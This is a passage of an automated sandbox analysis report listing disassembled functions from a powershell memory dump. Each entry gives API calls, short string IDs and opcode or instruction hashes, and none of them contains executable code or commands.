                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00424EA8
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00424F3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: "SB$Eq$u3F$u3F
                                                                                              • API String ID: 237503144-1006703298
                                                                                              • Opcode ID: 329f211979408143f7f9142e23c5d210538f9dcf17b7d21d18a09ec8f0118c30
                                                                                              • Instruction ID: 26a9ff5c6ea5d6f72bc5dc277945b872228d1dd641656778dc0c5fd45ec3cf2b
                                                                                              • Opcode Fuzzy Hash: 329f211979408143f7f9142e23c5d210538f9dcf17b7d21d18a09ec8f0118c30
                                                                                              • Instruction Fuzzy Hash: 4DC157B66583109FD314CF68DC8136BBBE1FBC5304F058A3DE5999B391D77499088B86
                                                                                              Function 004283E2 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 674COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00428720
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004287A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: J_AQ$yobu$G-A
                                                                                              • API String ID: 237503144-957821043
                                                                                              • Opcode ID: e9e72a649d211456b0dc307cb958669e60c3e86de33605e97f92fe1c777550e0
                                                                                              • Instruction ID: 07b0721920bb9d146fab60c3df0e6e6e2491f5ea82c563aa048fbf0137952d60
                                                                                              • Opcode Fuzzy Hash: e9e72a649d211456b0dc307cb958669e60c3e86de33605e97f92fe1c777550e0
                                                                                              • Instruction Fuzzy Hash: 0A323175A08351CFE3148F28E89072EB7E1EF86314F1A497DE595973A1CB35E841CB8A
                                                                                              Function 00428637 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 635COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00428720
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004287A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: J_AQ$yobu$G-A
                                                                                              • API String ID: 237503144-957821043
                                                                                              • Opcode ID: 83e9cbbdd5cc2e6a7de3f47b79c11831091cf65a21c448d902ca066d0be4feea
                                                                                              • Instruction ID: 36ba80c3182620463830545a573646f31edf93370a5276904d226bab6cad4d7f
                                                                                              • Opcode Fuzzy Hash: 83e9cbbdd5cc2e6a7de3f47b79c11831091cf65a21c448d902ca066d0be4feea
                                                                                              • Instruction Fuzzy Hash: 1F223175A08391CFE314CF28E88076ABBE1EF86310F1A497DE595973A1C775E841CB86
                                                                                              Function 0043D530 Relevance: 8.3, Strings: 6, Instructions: 761COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: 0U4y$4U4y$PQBS$S"(w$S"(w$f
                                                                                              • API String ID: 2994545307-3091287750
                                                                                              • Opcode ID: e2fc21d13428bbbbc26b62a2fc1bb312e2bb12307c48fb2cd31b329638bb2bc0
                                                                                              • Instruction ID: c559869433a4a61491acbf7ea7dc2e5a13c1ba46afc3d8d4216b28c5647020e3
                                                                                              • Opcode Fuzzy Hash: e2fc21d13428bbbbc26b62a2fc1bb312e2bb12307c48fb2cd31b329638bb2bc0
                                                                                              • Instruction Fuzzy Hash: 4D422775A083418FC324CF29D88066BBBE2EFC9314F19962EE4A547391D739EC05CB96
                                                                                              Function 004187C4 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 361COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: A\@$^\
                                                                                              • API String ID: 0-1463549531
                                                                                              • Opcode ID: 13fd37be47d89d169776f62c0b6bb4ace2f6d40f6cfcc2a69e994660b4209bea
                                                                                              • Instruction ID: 93b1d95cfbeb9b6d697e9ad8b9113af505894f77d9324656dbfe51f6af6eeebc
                                                                                              • Opcode Fuzzy Hash: 13fd37be47d89d169776f62c0b6bb4ace2f6d40f6cfcc2a69e994660b4209bea
                                                                                              • Instruction Fuzzy Hash: 02C13A75508311CBC714DF29C8906ABB7E2EFC5360F09896EE8C58B365EB38C945C756
                                                                                              Function 00427B1D Relevance: 6.8, Strings: 5, Instructions: 518COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLBF$G|yU$YTU_$mu${B
                                                                                              • API String ID: 0-3623597450
                                                                                              • Opcode ID: 337869b915685242dd405ce3aefd7408facdd130a6f483aad7861d25cdd47eec
                                                                                              • Instruction ID: a2167f6295f23111747c552ff2011875aa200dd7f46d1bf23163ec93fe3f6d8e
                                                                                              • Opcode Fuzzy Hash: 337869b915685242dd405ce3aefd7408facdd130a6f483aad7861d25cdd47eec
                                                                                              • Instruction Fuzzy Hash: C90222B460C3918BD714CF29E85136FBBE1AF86304F08882EE5C697352E639D905CB5B
                                                                                              Function 0042D4B4 Relevance: 6.4, Strings: 5, Instructions: 137COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,"W$,"W$6-[[$Rfdn$mhc'
                                                                                              • API String ID: 0-3746933419
                                                                                              • Opcode ID: 4aa5e4d01ad5155bf0dbc381390e002357ab52c1ef295a75b15fa6776c243cfa
                                                                                              • Instruction ID: b3fba3590cc5420813a38362f2071d0ca493cfb4d1da579361753585dbe1468c
                                                                                              • Opcode Fuzzy Hash: 4aa5e4d01ad5155bf0dbc381390e002357ab52c1ef295a75b15fa6776c243cfa
                                                                                              • Instruction Fuzzy Hash: B541F56060D3E24ADB398F3990647BBBFE09F97344F684DAEC0DA87282C7384546C756
                                                                                              Function 0041C230 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: QP'/$fd$uy$wr
                                                                                              • API String ID: 0-1006789313
                                                                                              • Opcode ID: 7d9382e01680e5249c191a3a0f0a473211fba8184f538003d90b56566bc60606
                                                                                              • Instruction ID: 355f79f2773f5d4ac0a77061cddeca1401e472fa318b1e8a601c047fe3fb2e93
                                                                                              • Opcode Fuzzy Hash: 7d9382e01680e5249c191a3a0f0a473211fba8184f538003d90b56566bc60606
                                                                                              • Instruction Fuzzy Hash: F5C1F475A483108BC714CF28CC917BBB7F1EF86314F189A6DE8958B390E7389945C78A
                                                                                              Function 0040AAE0 Relevance: 4.2, Strings: 3, Instructions: 416COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `$p$tu
                                                                                              • API String ID: 0-2989510876
                                                                                              • Opcode ID: d415547d90483d7d934edecace1c817a2517031186c7a55c2bc8a2d2ae40827b
                                                                                              • Instruction ID: 3dba8191ede0d0c0a362e39e16e3d0224afb87a815d849b54daf16c9c26b50b2
                                                                                              • Opcode Fuzzy Hash: d415547d90483d7d934edecace1c817a2517031186c7a55c2bc8a2d2ae40827b
                                                                                              • Instruction Fuzzy Hash: DCD127B160C3508BD324DF2588516AFBBE2AFD1304F18882DE9D5AB385D67DC915C78B
                                                                                              Function 00409650 Relevance: 4.1, Strings: 3, Instructions: 383COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0E71FDD4B91D2055A5CBFEF1C5D8D84E$6:$[X
                                                                                              • API String ID: 0-3057298974
                                                                                              • Opcode ID: 62fdddf5e22fde9cb11d92ab0dd341aad296da76bf1e3f6afa64294fc11450ee
                                                                                              • Instruction ID: 8f1c04615da7eed1bb5c849da53818e3bee2565023b7d9fb2777093bb6e34bac
                                                                                              • Opcode Fuzzy Hash: 62fdddf5e22fde9cb11d92ab0dd341aad296da76bf1e3f6afa64294fc11450ee
                                                                                              • Instruction Fuzzy Hash: 43B116B164C3808BD318DF25D89166BBBE2EFD2304F14886DE1D59B382D67C9509CB5A
                                                                                              Function 00426FA0 Relevance: 4.1, Strings: 3, Instructions: 381COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: BuB$DVWT$R(/.
                                                                                              • API String ID: 0-1784008327
                                                                                              • Opcode ID: 4c76054468d8ea838e3462e7c7de10b918ecc61395b7219116745af3f159ada4
                                                                                              • Instruction ID: 449bba254cc3ce8be8d0ef11d6089cfc4d1e26b27ef56f32503eae67831aa164
                                                                                              • Opcode Fuzzy Hash: 4c76054468d8ea838e3462e7c7de10b918ecc61395b7219116745af3f159ada4
                                                                                              • Instruction Fuzzy Hash: B7D1EFB5618350CFE324DF28E841B6BBBE1FB86304F54892DE5C9A72A1D7389805CB47
                                                                                              Function 00408E90 Relevance: 4.0, Strings: 3, Instructions: 281COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: /$V$io
                                                                                              • API String ID: 0-3412692449
                                                                                              • Opcode ID: 212a4a4f308acf422be1bf6925787bcd8a93c74c1294ebf7c67797f8d44194e3
                                                                                              • Instruction ID: 084ea4987a69ad933a23f807ad159ee56e4cbfd9da8820e8e9763e2f90124699
                                                                                              • Opcode Fuzzy Hash: 212a4a4f308acf422be1bf6925787bcd8a93c74c1294ebf7c67797f8d44194e3
                                                                                              • Instruction Fuzzy Hash: 0C71E53120C3828AD7058F39946037BBFE19FD7204F1895AED0D5AB287D67A890AC766
                                                                                              Function 0042F56D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: #v
                                                                                              • API String ID: 3664257935-554117064
                                                                                              • Opcode ID: c89f571cb86133ddaa43778ea529f31854b23b87d4817cf2a1326922cbde970f
                                                                                              • Instruction ID: 349e2acec282ee60714347da8e105c6b969ac5e154f09ba6def6b9ee4500d4c6
                                                                                              • Opcode Fuzzy Hash: c89f571cb86133ddaa43778ea529f31854b23b87d4817cf2a1326922cbde970f
                                                                                              • Instruction Fuzzy Hash: 4741267060C3D19BE3368F259861BABBFE4EF96304F14096DF4CA5B292D738450AC75A
                                                                                              Function 00429230 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004292E9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: iw
                                                                                              • API String ID: 237503144-3732844028
                                                                                              • Opcode ID: a0992e898172e2cf715cce1a025f4883b184a67a818c6127edead43f6493b065
                                                                                              • Instruction ID: 1d1092c6211fe5ecca44b462ec24f5d9e6adece2b18e3764e78bdeeb19268e43
                                                                                              • Opcode Fuzzy Hash: a0992e898172e2cf715cce1a025f4883b184a67a818c6127edead43f6493b065
                                                                                              • Instruction Fuzzy Hash: BA314C326583145FD718CF29DC52B6FB6F2E7C1304F05C53DD88297184DA38850A8B83
                                                                                              Function 00421700 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: VeXg$_$&'
                                                                                              • API String ID: 0-2218677500
                                                                                              • Opcode ID: 81af2f8fe74392de4e6be1d0a3fa04b3988f9176c6ca03651a32d55ce3f8087f
                                                                                              • Instruction ID: f6f28e64acfd1088fc344d91dfd1b849a106eabb6c88340fee093704ab6c9728
                                                                                              • Opcode Fuzzy Hash: 81af2f8fe74392de4e6be1d0a3fa04b3988f9176c6ca03651a32d55ce3f8087f
                                                                                              • Instruction Fuzzy Hash: FFD1EFB16083508FD710CF68D891B6BBBF0EF96354F04492DE9868B3A1E779E805CB56
                                                                                              Function 004262BB Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !N.L$A~
                                                                                              • API String ID: 0-257703145
                                                                                              • Opcode ID: 5ab5ed1c5340ef8b7478052b5bd31c7d3297faedf7d08844c4c1f0878ca8b32e
                                                                                              • Instruction ID: 8badceda985e2459676de706d6c304284cadaab0915d82bf42aec5394dd95461
                                                                                              • Opcode Fuzzy Hash: 5ab5ed1c5340ef8b7478052b5bd31c7d3297faedf7d08844c4c1f0878ca8b32e
                                                                                              • Instruction Fuzzy Hash: 66D12236608722CBC324DF68E8801ABB3E2FF99744F96892ED5C187364E7389D55C749
                                                                                              Function 00427A20 Relevance: 2.8, Strings: 2, Instructions: 343COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ;8$mu
                                                                                              • API String ID: 0-1374345267
                                                                                              • Opcode ID: 3d3689c7230d9feaa15c9619db4b65319b44a9d8cb80a687b1e2613e173cbc51
                                                                                              • Instruction ID: 38493b626cd9f3c9f8eefb82f58b1aa75da1e38ac46bc62bd4ad19e9f604f485
                                                                                              • Opcode Fuzzy Hash: 3d3689c7230d9feaa15c9619db4b65319b44a9d8cb80a687b1e2613e173cbc51
                                                                                              • Instruction Fuzzy Hash: BCC112B46083908FD334DF25D84176BBBE1EB82304F44886DE5C88B352EB799945CB9B
                                                                                              Function 0041CBA0 Relevance: 2.8, Strings: 2, Instructions: 323COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *$./()
                                                                                              • API String ID: 0-1336402209
                                                                                              • Opcode ID: e863745145314867523a98316f59902c24a155e28d1e5c922bfcf22c39fe0d43
                                                                                              • Instruction ID: 70263b0e1c3418d2e38858e0224803163106548a50681dc4e35af678056627ab
                                                                                              • Opcode Fuzzy Hash: e863745145314867523a98316f59902c24a155e28d1e5c922bfcf22c39fe0d43
                                                                                              • Instruction Fuzzy Hash: 0AA12A726482514FC7118E28DC912AFFBD2AB85324F18867EE8E9D7382D678DC46C7D1
                                                                                              Function 00429AA2 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K0*C$O0*C
                                                                                              • API String ID: 0-2397125668
                                                                                              • Opcode ID: 57251f6b818e8f331cdba341475c460171a0f4bbbd93441410ae8063b3c7f8b1
                                                                                              • Instruction ID: c6a917770a05bc5aa2137002550ee722dd2d6c93140052fee8117690200ce488
                                                                                              • Opcode Fuzzy Hash: 57251f6b818e8f331cdba341475c460171a0f4bbbd93441410ae8063b3c7f8b1
                                                                                              • Instruction Fuzzy Hash: 5751F1B4A083208BC3149F25D86276BB7F1EFD6724F44896DE4C68B381E338D945D75A
                                                                                              Function 0041A910 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: _$X
                                                                                              • API String ID: 0-211710773
                                                                                              • Opcode ID: bf99323c19593e5219e39e63777200f5e24a972a69cd8db077ac566767e1656e
                                                                                              • Instruction ID: ebe35a4166574661b4c67d581afd8fc5a02ab28d67edeced225560c405bf1cd6
                                                                                              • Opcode Fuzzy Hash: bf99323c19593e5219e39e63777200f5e24a972a69cd8db077ac566767e1656e
                                                                                              • Instruction Fuzzy Hash: 22319A77E197618BC310CE24CD4126BBAA28FD2320F1C857DD4D197387D6388906879A
                                                                                              Function 00427A40 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D^4*$X^4*
                                                                                              • API String ID: 0-3817576274
                                                                                              • Opcode ID: 67bb111c9c910f36a9f84e0902a185c32293dc4de171acf8cab574b10b330e4a
                                                                                              • Instruction ID: 84b922f913ff43acb77946be581ae730b8711f74cd52a9676d2568103c8f6162
                                                                                              • Opcode Fuzzy Hash: 67bb111c9c910f36a9f84e0902a185c32293dc4de171acf8cab574b10b330e4a
                                                                                              • Instruction Fuzzy Hash: D4118EB1A0D7809BE708AF25E46475FFBE5AB86308F04492CE0C58B241C7B9C446CB5A
                                                                                              Function 00421BF0 Relevance: 1.7, Strings: 1, Instructions: 443COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: bc
                                                                                              • API String ID: 0-3265866552
                                                                                              • Opcode ID: 570289d85ca72c91e6fa50a3f6b3d4299425e0db5a3e071ec706d7be7e44fedf
                                                                                              • Instruction ID: b48a1bf21b2da6249629cda660b69f5b67d6c26ec16ce6a4a06b498b794a5d11
                                                                                              • Opcode Fuzzy Hash: 570289d85ca72c91e6fa50a3f6b3d4299425e0db5a3e071ec706d7be7e44fedf
                                                                                              • Instruction Fuzzy Hash: 2DB17B76B043218BD7149F29DC92377B3E5EFE5354F59442EE482873A1E778A801C35A
                                                                                              Function 004161BC Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D
                                                                                              • API String ID: 0-2746444292
                                                                                              • Opcode ID: 0d8c37688827c5cefc01c971e824fcb7f21c95560906b1e5d86dd7272439249d
                                                                                              • Instruction ID: d90d6e6036c163f58fd908ec378ab2c9c54c4859bbf4d2627147bc4f738d6256
                                                                                              • Opcode Fuzzy Hash: 0d8c37688827c5cefc01c971e824fcb7f21c95560906b1e5d86dd7272439249d
                                                                                              • Instruction Fuzzy Hash: C0C19CB0108380CFD7249F24C461BABBBF0EF96314F15495DE5DA5B3A2E3788945CB5A
                                                                                              Function 004296EE Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: I
                                                                                              • API String ID: 0-3707901625
                                                                                              • Opcode ID: 7826da0cecf27cd713dfa553b246dcdaeb3e76aba8a0c3347e4c8cf8caa203d2
                                                                                              • Instruction ID: 89a1cbdd935f664cbab53b1a3badc06b7d92b7b330e283b43059301f25144cad
                                                                                              • Opcode Fuzzy Hash: 7826da0cecf27cd713dfa553b246dcdaeb3e76aba8a0c3347e4c8cf8caa203d2
                                                                                              • Instruction Fuzzy Hash: 6D81F2B0A0C3409FD754DF68D88266BB7E1AF86304F48496EF5958B392E739DC05CB4A
                                                                                              Function 00416C59 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 3oA
                                                                                              • API String ID: 0-986875061
                                                                                              • Opcode ID: 95898ede6513406ed7dc31eee92a353a55a84b157f89933cf5132eec68c96a53
                                                                                              • Instruction ID: 327200b7b3488fb93ecbeef10cf7547d8945211a0dd8b8c9d73ac7f8e0a109ae
                                                                                              • Opcode Fuzzy Hash: 95898ede6513406ed7dc31eee92a353a55a84b157f89933cf5132eec68c96a53
                                                                                              • Instruction Fuzzy Hash: E661D1B8210600DBD734CF14EC40BB773A6EB85320F66962DE499532A1E734EC92CB58
                                                                                              Function 00419E30 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: _
                                                                                              • API String ID: 0-701932520
                                                                                              • Opcode ID: b29612ca1f030c344e6b1345539b5ec678865535b78316023fde072572f60f60
                                                                                              • Instruction ID: 7d81453da85a349c185ed544530200effc65bdc5321c1556367075478a1733c2
                                                                                              • Opcode Fuzzy Hash: b29612ca1f030c344e6b1345539b5ec678865535b78316023fde072572f60f60
                                                                                              • Instruction Fuzzy Hash: A861E21520468009DB2CDF7489A333BBAE59F45309F2C91BEC995CFAD7E939C202878D
                                                                                              Function 0043AEF0 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: {SNM
                                                                                              • API String ID: 2994545307-2501326798
                                                                                              • Opcode ID: e542e8910a96073d3a8b66515e5e2fb57dadfe33a65f1148684065bed838a745
                                                                                              • Instruction ID: 9ee9bb27e8194fbbe19d4136d9c19deb0c6e0c6936b4e12b05a260f7015621c2
                                                                                              • Opcode Fuzzy Hash: e542e8910a96073d3a8b66515e5e2fb57dadfe33a65f1148684065bed838a745
                                                                                              • Instruction Fuzzy Hash: 88316AB1A04300ABF714AE15DC41F2B77A8EF85758F10583EF98593252E379DC108B9B
                                                                                              Function 00418BED Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ;
                                                                                              • API String ID: 0-1661535913
                                                                                              • Opcode ID: d282f43b92f00fd3f2ba2869d40551cb8d28f723714f48c0b3ca2754b242ec63
                                                                                              • Instruction ID: ba7a73de05aa61a9cb5ed29c6ad315d8865d397446500eba63c01d234e38ea60
                                                                                              • Opcode Fuzzy Hash: d282f43b92f00fd3f2ba2869d40551cb8d28f723714f48c0b3ca2754b242ec63
